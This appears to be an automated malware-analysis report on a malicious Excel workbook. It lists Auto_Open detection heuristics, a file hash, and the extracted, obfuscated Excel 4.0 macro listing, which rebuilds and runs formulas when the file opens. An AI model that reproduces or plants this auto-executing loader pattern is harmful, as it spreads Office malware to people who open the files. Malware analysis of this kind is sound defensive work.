MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6507 bytes |

SHA-256: 14f4a74b950c2a0947a66e42709d43234487288fdbdef0bbf96cd4786fcf2807

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - CMLrcoT
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E163
' 0018 25 LABEL : Cell Value, String Constant - bCRfiiXXfy len=0
' 0018 26 LABEL : Cell Value, String Constant - CgxODsPsFFo len=0
' 0018 24 LABEL : Cell Value, String Constant - cHRHWaxBV len=0
' 0018 23 LABEL : Cell Value, String Constant - EOzAinen len=0
' 0018 22 LABEL : Cell Value, String Constant - eTnMgjt len=0
' 0018 20 LABEL : Cell Value, String Constant - Iqtzl len=0
' 0018 27 LABEL : Cell Value, String Constant - JFvKtSDFwJvF len=0
' 0018 24 LABEL : Cell Value, String Constant - KTBHfORde len=0
' 0018 25 LABEL : Cell Value, String Constant - PuLmJZwrlx len=0
' 0018 22 LABEL : Cell Value, String Constant - PXLeFEG len=0
' 0018 27 LABEL : Cell Value, String Constant - QzZFgxTylfBT len=0
' 0018 23 LABEL : Cell Value, String Constant - rdUrMXuh len=0
' 0018 22 LABEL : Cell Value, String Constant - REnOUqe len=0
' 0018 22 LABEL : Cell Value, String Constant - SlqEkLe len=0
' 0018 21 LABEL : Cell Value, String Constant - SsnjCf len=0
' 0018 21 LABEL : Cell Value, String Constant - tJyfOE len=0
' 0018 25 LABEL : Cell Value, String Constant - trlBjCrzxm len=0
' 0018 27 LABEL : Cell Value, String Constant - VpVgcdCoutnZ len=0
' 0018 26 LABEL : Cell Value, String Constant - xdaDWzPLFwn len=0
' 0018 27 LABEL : Cell Value, String Constant - YwdpiFgWrmVr len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' CMLrcoT,E68,"SET.NAME("Iqtzl",VALUE("0"))",""
' CMLrcoT,E73,"SET.NAME("SsnjCf",Iqtzl)",""
' CMLrcoT,E75,"SET.NAME("SlqEkLe",Iqtzl)",""
' CMLrcoT,E78,"SET.NAME("KTBHfORde",COUNTA(cHRHWaxBV))",""
' CMLrcoT,E82,"SET.NAME("VpVgcdCoutnZ",COUNTA(tJyfOE))",""
' CMLrcoT,E87,[],""
' CMLrcoT,E90,"SET.NAME("eTnMgjt","")",""
' CMLrcoT,E93,"SsnjCf",""
' CMLrcoT,E97,"SET.NAME("YwdpiFgWrmVr",HLOOKUP("*",cHRHWaxBV,SsnjCf,FALSE))",""
' CMLrcoT,E99,"CgxODsPsFFo",""
' CMLrcoT,E101,"SET.NAME("PXLeFEG",Iqtzl)",""
' CMLrcoT,E106,[],""
' CMLrcoT,E108,"PXLeFEG",""
' CMLrcoT,E111,"REnOUqe",""
' CMLrcoT,E113,"PuLmJZwrlx",""
' CMLrcoT,E118,"bCRfiiXXfy",""
' CMLrcoT,E123,"SET.NAME("trlBjCrzxm",VALUE(HLOOKUP("*",tJyfOE,bCRfiiXXfy,FALSE)))",""
' CMLrcoT,E128,"JFvKtSDFwJvF",""
' CMLrcoT,E132,"eTnMgjt",""
' CMLrcoT,E136,"SlqEkLe",""
' CMLrcoT,E141,NEXT(),""
' CMLrcoT,E146,"QzZFgxTylfBT",""
' CMLrcoT,E150,"SET.NAME("f",INT(T(FORMULA(T(eTnMgjt)&"",""&T(QzZFgxTylfBT)))))",""
' CMLrcoT,E152,"xdaDWzPLFwn",""
' CMLrcoT,E156,NEXT(),""
' CMLrcoT,E161,RETURN(),""
' CMLrcoT,E185,"SET.NAME("rdUrMXuh",E68)",""
' CMLrcoT,E189,"cHRHWaxBV",""
' CMLrcoT,E191,"SET.NAME("tJyfOE",R79C12)",""
' CMLrcoT,E193,"SET.NAME("xdaDWzPLFwn",201)",""
' CMLrcoT,E195,"SET.NAME("EOzAinen",5)",""
' CMLrcoT,E200,rdUrMXuh(),""
' CMLrcoT,E201,HALT(),""